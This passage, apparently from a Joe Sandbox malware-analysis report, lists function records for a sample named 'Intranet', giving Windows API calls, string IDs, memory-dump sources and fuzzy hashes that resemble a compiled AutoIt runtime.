                                                                              • Part of subcall function 004A29AB: GetWindowLongW.USER32(?,000000EB,?,?,?,004A1AE0,?,?,?,?,?,?,004A1D8F,?,?,?), ref: 004A29BC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                            • String ID: 0$tooltips_class32
                                                                            • API String ID: 1297703922-3619404913
                                                                            • Opcode ID: d4901b0c307316cc47cf09f054c835ad05c175a87c77421c0f67aa31775f7303
                                                                            • Instruction ID: 1a8466cd8d37694d6ae82e3952559c59ce4cdcae3fc0e5672235997a7bed0332
                                                                            • Opcode Fuzzy Hash: d4901b0c307316cc47cf09f054c835ad05c175a87c77421c0f67aa31775f7303
                                                                            • Instruction Fuzzy Hash: 49719871140304AFD722CF28DC5AF6A7BEAFF9A304F04051DF986872A1D770A945DB62
                                                                            APIs
                                                                              • Part of subcall function 004A29E2: GetWindowLongW.USER32(?,000000EB,?,?,?,004A1CE4,?), ref: 004A29F3
                                                                            • DragQueryPoint.SHELL32(?,?,?,?,?,?), ref: 0052CCCF
                                                                              • Part of subcall function 0052B1A9: ClientToScreen.USER32(?,?,?,?,?,?,?,?,?,0052C6BC,?,?,?), ref: 0052B1D2
                                                                              • Part of subcall function 0052B1A9: GetWindowRect.USER32(?,?), ref: 0052B248
                                                                              • Part of subcall function 0052B1A9: PtInRect.USER32(?,?,0052C6BC,?,?), ref: 0052B258
                                                                            • SendMessageW.USER32(?,000000B0,?,?,?,?,?), ref: 0052CD38
                                                                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0052CD43
                                                                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0052CD66
                                                                            • _wcscat.LIBCMT ref: 0052CD96
                                                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0052CDAD
                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 0052CDC6
                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 0052CDDD
                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 0052CDFF
                                                                            • DragFinish.SHELL32(?), ref: 0052CE06
                                                                            • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0052CEF9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                            • API String ID: 169749273-3440237614
                                                                            • Opcode ID: 8a4cf114416ab5276db4e4291838d6d5ea26b12799c1b6c36956818a6ed11f43
                                                                            • Instruction ID: 1e50c46e7f22196cc630d2119f9ff7050fa6b3796e4c1fc4758cbf9a3882950f
                                                                            • Opcode Fuzzy Hash: 8a4cf114416ab5276db4e4291838d6d5ea26b12799c1b6c36956818a6ed11f43
                                                                            • Instruction Fuzzy Hash: 93614571108301AFC701EF64D899D9FBFE8BF99754F000A1EF595922A1DB70AA09CB62
                                                                            APIs
                                                                            • #8.OLEAUT32(00000000,00000000,?,?,?,?,?,?,0000002A,00000000,00530980), ref: 0050831A
                                                                            • #10.WSOCK32(00000000,?,?,?,?,?,?,0000002A,00000000,00530980), ref: 00508323
                                                                            • #9.WSOCK32(00000000,?,?,?,?,?,0000002A,00000000,00530980), ref: 0050832F
                                                                            • #185.OLEAUT32(?,?,?,?,0000002A,00000000,00530980), ref: 0050841D
                                                                            • __swprintf.LIBCMT ref: 0050844D
                                                                            • #220.OLEAUT32(?,?,?,?,?,00000029,00000000,Default), ref: 00508479
                                                                            • #8.OLEAUT32(?,?,00000000,00000000), ref: 0050852A
                                                                            • #6.OLEAUT32(?,?), ref: 005085BE
                                                                            • #9.WSOCK32(?), ref: 00508618
                                                                            • #9.WSOCK32(?), ref: 00508627
                                                                            • #8.OLEAUT32(00000000,00000000,?,00000000,00000000), ref: 00508665
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: #185#220__swprintf
                                                                            • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                            • API String ID: 2563594795-3931177956
                                                                            • Opcode ID: b510ee0bf9afd6324752984d0348322a6b5febba84248046d723fd1bc22d5ec3
                                                                            • Instruction ID: 0e4b103c69c21afdc8b71837069590cab42a41e698cce471f2bf32f14b95c000
                                                                            • Opcode Fuzzy Hash: b510ee0bf9afd6324752984d0348322a6b5febba84248046d723fd1bc22d5ec3
                                                                            • Instruction Fuzzy Hash: A4D1D231604615EBDB249F61C894FBEBBB4BF85B00F14895AE9859B2C0DF74EC44DBA0
                                                                            APIs
                                                                            • CharUpperBuffW.USER32(?,?), ref: 00524A61
                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000,00530980), ref: 00524AAC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharMessageSendUpper
                                                                            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                            • API String ID: 3974292440-4258414348
                                                                            • Opcode ID: 352b4642b2d98d2b4c785e36c801b745a2a764563c11aa27069c3a8da5ea2b0b
                                                                            • Instruction ID: 8aeb202d0d1cc5772b06e215fd7d4be72dbeadc078465debf79e05f1d3df953b
                                                                            • Opcode Fuzzy Hash: 352b4642b2d98d2b4c785e36c801b745a2a764563c11aa27069c3a8da5ea2b0b
                                                                            • Instruction Fuzzy Hash: AD919E742007119FCB04EF25C451A6EBBA1BF95358F10885EF8965B3A2CB78FD09CB85
                                                                            APIs
                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00002010,00000000,?,?,?,?,?,005297E7), ref: 0052BF26
                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,005297E7), ref: 0052BF82
                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0052BFBB
                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0052BFFE
                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0052C035
                                                                            • FreeLibrary.KERNEL32(?), ref: 0052C041
                                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001,?,?,?,?,005297E7), ref: 0052C051
                                                                            • DestroyIcon.USER32(?,?,?,?,?,005297E7), ref: 0052C060
                                                                            • SendMessageW.USER32(?,00000170,00000000,00000000,?,?,?,?,005297E7), ref: 0052C07D
                                                                            • SendMessageW.USER32(?,00000064,00000172,00000001,?,?,?,?,005297E7), ref: 0052C089
                                                                              • Part of subcall function 004C312D: __wcsicmp_l.LIBCMT ref: 004C31B6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                            • String ID: .dll$.exe$.icl
                                                                            • API String ID: 1212759294-1154884017
                                                                            • Opcode ID: 483182d5bbf80cdd8f10595d5ac8dfea5b92eff36d0d85d15e9e8003d5f90794
                                                                            • Instruction ID: 042a9ab5e9d5e8551692362fac3b8a3da296d56347fb8f0546b08f17fced3307
                                                                            • Opcode Fuzzy Hash: 483182d5bbf80cdd8f10595d5ac8dfea5b92eff36d0d85d15e9e8003d5f90794
                                                                            • Instruction Fuzzy Hash: 7F61BD71500228FEEB24DF64ED45BBE7BA8FF09710F10420AF915D61C1DBB5AA94DBA0
                                                                            APIs
                                                                            • GetLocalTime.KERNEL32(?), ref: 0050E31F
                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 0050E32F
                                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0050E33B
                                                                            • __wsplitpath.LIBCMT ref: 0050E399
                                                                            • _wcscat.LIBCMT ref: 0050E3B1
                                                                            • _wcscat.LIBCMT ref: 0050E3C3
                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0050E3D8
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0050E3EC
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0050E41E
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0050E43F
                                                                            • _wcscpy.LIBCMT ref: 0050E44B
                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0050E48A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                            • String ID: *.*
                                                                            • API String ID: 3566783562-438819550
                                                                            • Opcode ID: 89e8042f9d802e5b76b862917bc57274b392ecfe8fc73d1087e31574f7f147b8
                                                                            • Instruction ID: e2d2076db567cfa63e6b08073198daabf1f62206f16ad62a7429f4c67386f1a7
                                                                            • Opcode Fuzzy Hash: 89e8042f9d802e5b76b862917bc57274b392ecfe8fc73d1087e31574f7f147b8
                                                                            • Instruction Fuzzy Hash: 536198761043059FCB10EF60C845A9FB7E8BF89314F048D1EF98987291EB35E905CB96
                                                                            APIs
                                                                            • LoadStringW.USER32(00000066,?,00000FFF,?,00000000,?,?,0051CF1B,?,?,00000035,?,0053098C,?,?,00000016), ref: 0050A2C2
                                                                              • Part of subcall function 004B1A36: _memmove.LIBCMT ref: 004B1A77
                                                                            • LoadStringW.USER32(00000072,?,00000FFF,?,?,0051CF1B,?,?,00000035,?,0053098C,?,?,00000016,?), ref: 0050A2E3
                                                                            • __swprintf.LIBCMT ref: 0050A33C
                                                                            • __swprintf.LIBCMT ref: 0050A355
                                                                            • _wprintf.LIBCMT ref: 0050A3FC
                                                                            • _wprintf.LIBCMT ref: 0050A41A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: LoadString__swprintf_wprintf$_memmove
                                                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                            • API String ID: 311963372-3080491070
                                                                            • Opcode ID: 147a71a536e1622e0fb6321d00f6099a2e81823216a0e0484250a0aae0d9846e
                                                                            • Instruction ID: ea5254e1978e0950a9fb8c22efc689cb870d2ae3a5ecaae29a7133f1eafbf4aa
                                                                            • Opcode Fuzzy Hash: 147a71a536e1622e0fb6321d00f6099a2e81823216a0e0484250a0aae0d9846e
                                                                            • Instruction Fuzzy Hash: 4151E371800209AACF14EBE1CD66EEEBB78FF14344F50015AF405B20A2EB792F58DB65
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,?,?,004EF8B8,00000001,0000138C,00000001,?,00000001,?,00513FF9,?), ref: 0050009A
                                                                            • LoadStringW.USER32(00000000,?,004EF8B8,00000001,0000138C,00000001,?,00000001,?,00513FF9,?,00000001,?,00513FF9,00000040,00000064), ref: 005000A3
                                                                              • Part of subcall function 004B1A36: _memmove.LIBCMT ref: 004B1A77
                                                                            • GetModuleHandleW.KERNEL32(00000000,00567310,?,00000FFF,?,?,004EF8B8,00000001,0000138C,00000001,?,00000001,?,00513FF9,?,00000001), ref: 005000C5
                                                                            • LoadStringW.USER32(00000000,?,004EF8B8,00000001,0000138C,00000001,?,00000001,?,00513FF9,?,00000001,?,00513FF9,00000040,00000064), ref: 005000C8
                                                                            • __swprintf.LIBCMT ref: 00500118
                                                                            • __swprintf.LIBCMT ref: 00500129
                                                                            • _wprintf.LIBCMT ref: 005001D2
                                                                            • MessageBoxW.USER32(00000000,?,?,00011010,?,Error: ,00533B88,?), ref: 005001E9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                            • API String ID: 984253442-2268648507
                                                                            • Opcode ID: 46f8055f44259123466a01758c3fbe505fa328f505662ad56d2b0d91e6c6640a
                                                                            • Instruction ID: 308327885512780f63360bd782d7e6d7de373b81a5837452d355eb99014682f4
                                                                            • Opcode Fuzzy Hash: 46f8055f44259123466a01758c3fbe505fa328f505662ad56d2b0d91e6c6640a
                                                                            • Instruction Fuzzy Hash: 45415272800119AACF15FBE1CDA6EEEB77CAF54345F50015AF505B20A1DA386F08CB75
                                                                            APIs
                                                                              • Part of subcall function 004A4D37: __itow.LIBCMT ref: 004A4D62
                                                                              • Part of subcall function 004A4D37: __swprintf.LIBCMT ref: 004A4DAC
                                                                            • CharLowerBuffW.USER32(?,?), ref: 0050AA0E
                                                                            • GetDriveTypeW.KERNEL32 ref: 0050AA5B
                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0050AAA3
                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0050AADA
                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0050AB08
                                                                              • Part of subcall function 004B1821: _memmove.LIBCMT ref: 004B185B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                            • API String ID: 2698844021-4113822522
                                                                            • Opcode ID: 77f30c94d94c0f458413f581fce9ead5a6b36d07238d87dc83474fa08fdc5f79
                                                                            • Instruction ID: ded5761890f2b4ce8c10b785b8e811df71722749b4f0aaded8d3dea8c33695f5
                                                                            • Opcode Fuzzy Hash: 77f30c94d94c0f458413f581fce9ead5a6b36d07238d87dc83474fa08fdc5f79
                                                                            • Instruction Fuzzy Hash: D1517C711043049FD700EF21C8A19AEBBF4FF98758F50491EF896572A1DB35AE09CB92
                                                                            APIs
                                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0050A852
                                                                            • __swprintf.LIBCMT ref: 0050A874
                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 0050A8B1
                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0050A8D6
                                                                            • _memset.LIBCMT ref: 0050A8F5
                                                                            • _wcsncpy.LIBCMT ref: 0050A931
                                                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0050A966
                                                                            • CloseHandle.KERNEL32(00000000), ref: 0050A971
                                                                            • RemoveDirectoryW.KERNEL32(?), ref: 0050A97A
                                                                            • CloseHandle.KERNEL32(00000000), ref: 0050A984
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                            • String ID: :$\$\??\%s
                                                                            • API String ID: 2733774712-3457252023
                                                                            • Opcode ID: e0e25bb24fb13494a7b72f60a55ca31f34936c74dfa0d012aecaf7c18017bac3
                                                                            • Instruction ID: 6ed8ea43ec44bdbcc630e54213ba17eb996cd6225d2ec0eb33b0f28ec2542890
                                                                            • Opcode Fuzzy Hash: e0e25bb24fb13494a7b72f60a55ca31f34936c74dfa0d012aecaf7c18017bac3
                                                                            • Instruction Fuzzy Hash: 9E31A17650021AABDB219FA1DC49FEF77BCFF88701F1045AAF908D21A4E7749648CB25
                                                                            APIs
                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0052982C,?,?), ref: 0052C0C8
                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0052982C,?,?,00000000,?), ref: 0052C0DF
                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0052982C,?,?,00000000,?), ref: 0052C0EA
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,0052982C,?,?,00000000,?), ref: 0052C0F7
                                                                            • GlobalLock.KERNEL32(00000000), ref: 0052C100
                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0052982C,?,?,00000000,?), ref: 0052C10F
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0052C118
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,0052982C,?,?,00000000,?), ref: 0052C11F
                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0052982C,?,?,00000000,?), ref: 0052C130
                                                                            • #418.OLEAUT32(?,00000000,00000000,00533C7C,?,?,?,?,?,0052982C,?,?,00000000,?), ref: 0052C149
                                                                            • GlobalFree.KERNEL32(00000000), ref: 0052C159
                                                                            • GetObjectW.GDI32(00000000,00000018,?,?,?,?,?,0052982C,?,?,00000000,?), ref: 0052C17D
                                                                            • CopyImage.USER32(00000000,00000000,?,?,00002000,?,?,?,?,0052982C,?,?,00000000,?), ref: 0052C1A8
                                                                            • DeleteObject.GDI32(00000000,00000000,?,?,?,?,?,0052982C,?,?,00000000,?), ref: 0052C1D0
                                                                            • SendMessageW.USER32(?,00000172,00000000,00000000,00000000,?,?,?,?,?,0052982C,?,?,00000000,?), ref: 0052C1E6
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Global$File$CloseCreateHandleObject$#418AllocCopyDeleteFreeImageLockMessageReadSendSizeStreamUnlock
                                                                            • String ID:
                                                                            • API String ID: 2779716855-0
                                                                            • Opcode ID: ca682e4ed39ffc2425a657bd7208e67510b14b2ecb2a5b2adf8b3f58e3fba39f
                                                                            • Instruction ID: c83cc6ec1bb29047cdcbb4c1a9655ac37570d6348e8daba88a5151399aab477e
                                                                            • Opcode Fuzzy Hash: ca682e4ed39ffc2425a657bd7208e67510b14b2ecb2a5b2adf8b3f58e3fba39f
                                                                            • Instruction Fuzzy Hash: 7B412875500218AFCB119F64DC8CEAE7FB8FF9A711F104058F905E72A1D7309945EB60
                                                                            APIs
                                                                            • __wsplitpath.LIBCMT ref: 0050E053
                                                                            • _wcscat.LIBCMT ref: 0050E06B
                                                                            • _wcscat.LIBCMT ref: 0050E07D
                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0050E092
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0050E0A6
                                                                            • GetFileAttributesW.KERNEL32(?), ref: 0050E0BE
                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 0050E0D8
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0050E0EA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                            • String ID: *.*
                                                                            • API String ID: 34673085-438819550
                                                                            • Opcode ID: 2ff8d422fe5834223cb840bdef4bff042b5e557e34caeab429444c47df081da6
                                                                            • Instruction ID: b5533e8bac98f3da9d807f273174506f76225f81318a54be0a731c232ecde425
                                                                            • Opcode Fuzzy Hash: 2ff8d422fe5834223cb840bdef4bff042b5e557e34caeab429444c47df081da6
                                                                            • Instruction Fuzzy Hash: 9A8190715043469FC724DFA4C84596EBBE8BF99314F148C2EF886C7290E774E944CB62
                                                                            APIs
                                                                              • Part of subcall function 004A29E2: GetWindowLongW.USER32(?,000000EB,?,?,?,004A1CE4,?), ref: 004A29F3
